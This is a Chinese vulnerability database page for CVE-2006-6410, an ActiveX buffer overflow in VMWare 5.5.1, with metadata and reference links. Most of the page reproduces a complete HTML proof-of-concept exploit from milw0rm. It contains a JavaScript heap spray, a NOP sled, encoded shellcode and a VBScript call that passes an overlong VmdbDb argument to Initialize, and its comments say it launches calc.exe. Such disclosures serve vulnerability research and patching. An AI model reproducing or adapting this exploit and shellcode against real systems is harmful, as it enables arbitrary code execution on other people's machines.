VMWare ActiveX控件Initialize函数缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110901 漏洞类型 缓冲区溢出
发布时间 2006-08-27 更新时间 2006-12-11
CVE编号 CVE-2006-6410 CNNVD-ID CNNVD-200612-170
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/2264
https://cxsecurity.com/issue/WLB-2006120080
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-170
|漏洞详情
VMWare5.5.1中的ActiveX控件存在缓冲区溢出,本地用户可通过传给Initialize函数的长的VmdbDb参数来执行任意代码。
|漏洞EXP
/*
 *****************************************************************************************************************
  $ An open security advisory #17 - VMWare ActiveX lame local overflow
 *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org
  2: Bug Released: August 18th or so... 2006
  3: Bug Impact Rate: Code execution
  4: Bug Scope Rate: Local 
 *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
 *****************************************************************************************************************


 VMWare
 http://vmware.com

 "Revolutionize software development, testing and deployment in your enterprise with powerful virtual
 machine software for developers and system administrators. VMware Workstation delivers powerful
 virtual machine software for the technical professional."

 Since this is a local only for ActiveX component, it requires being emailed or distribution via some
 p2p file share network or p2p chat networks. Pretty useless :)

*/


<html>
<head>
<title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
</head>
<body>
<center>
<br>
Discovered and developed by c0ntex - c0ntexb@gmail.com<br>
Visit my website at http://www.open-security.org<br>
<br>
<h3>
This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
(fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
</h3>
I have only found a bad solution to this bug. Due to the fact that<br>
my controlling assembler is a call dword ptr[reg] I need to point<br>
to a location I control, fine. However my payload is random pretty<br>
much every run. Therefor I fill half a HUGE  buffer with the address<br>
(pointer) to my evil buffer, which them trampolines me to shellcode<br>
<br>
call ptr [reg]<br>
[reg] -> 0xtrampoline<br>
0xtrampoline -> shellcode<br>
<br>
</center>
<script>
var buffa1 = unescape("%uedb0%u0d91") 
do {
buffa1 += buffa1;
}
while (buffa1.length < 0x500000);
var buffa2 = unescape("%u9090%u9090") 
do {
buffa2 += buffa2;
}
while (buffa2.length < 0x800000);
buffa1 += buffa2;
buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
</script>
<object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
</object>
<script language="vbscript">
VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
VmdbPoll=200011744
target.Initialize VmdbDb, VmdbPoll
</script>
</body>

# milw0rm.com [2006-08-27]
|参考资料

来源:BID
名称:19732
链接:http://www.securityfocus.com/bid/19732
来源:BUGTRAQ
名称:20061127Re:VMware5.5.1LocalBufferOverflow(HTMLExploit)
链接:http://www.securityfocus.com/archive/1/archive/1/452775/100/100/threaded
来源:BUGTRAQ
名称:20061126VMware5.5.1LocalBufferOverflow(HTMLExploit)
链接:http://www.securityfocus.com/archive/1/archive/1/452746/100/100/threaded
来源:MISC
链接:http://www.open-security.org/advisories/17
来源:MILW0RM
名称:2264
链接:http://www.milw0rm.com/exploits/2264
来源:SREASON
名称:2008
链接:http://securityreason.com/securityalert/2008
来源:MILW0RM
名称:2264
链接:http://milw0rm.com/exploits/2264